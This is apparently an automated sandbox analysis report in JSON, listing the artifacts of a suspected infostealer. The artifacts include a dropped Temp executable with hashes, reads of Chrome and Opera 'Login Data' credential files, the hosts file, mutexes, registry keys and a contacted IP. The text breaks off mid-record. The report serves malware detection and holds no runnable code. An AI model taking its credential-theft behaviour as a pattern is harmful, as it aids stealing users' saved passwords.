{ "analysis_details": { "creation_time": "2017-12-20 15:26 (UTC+1)", "execution_successful": true, "number_of_processes": 9, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:20" }, "artifacts": { "files": [ { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32", "hashes": [], "norm_filename": "c:\\windows\\system32", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows", "hashes": [], "norm_filename": "c:\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", "hashes": [ { "md5_hash": "437efd63bf864669ef4312750c25c462", "sha1_hash": "247f0b1576c24e50830f6ee326dce494c6ba478d", "sha256_hash": "c5221c1250b9584be4be97a30dde5f1b82c3509749df7bf76a7d0c9d85514a5a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\ntdll.dll", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Windows\\System32\\cmmon32.exe", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\cmmon32.exe", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Temp\\lambdoidtegument.exe", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\temp\\lambdoidtegument.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\drivers\\etc\\hosts", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", "hashes": [], "norm_filename": "\\??\\c:\\program files\\crfitq6x\\gdigzvh.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlog.ini", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-\\ololog.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-\\olologrc.ini", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\opera software\\opera stable\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-\\olologrv.ini", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", "hashes": [], "norm_filename": "\\??\\c:\\program files\\mozilla firefox\\firefox.exe", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", "hashes": [], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp", "hashes": [], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "192.232.251.15", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\.net clr networking", "operations": [ "delete", "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Nameless", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "664908S9UTEIZ6MN", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "OLO0NDS-0AXWwKzG", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PageSetup", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Script\\Features", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\COM3", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": 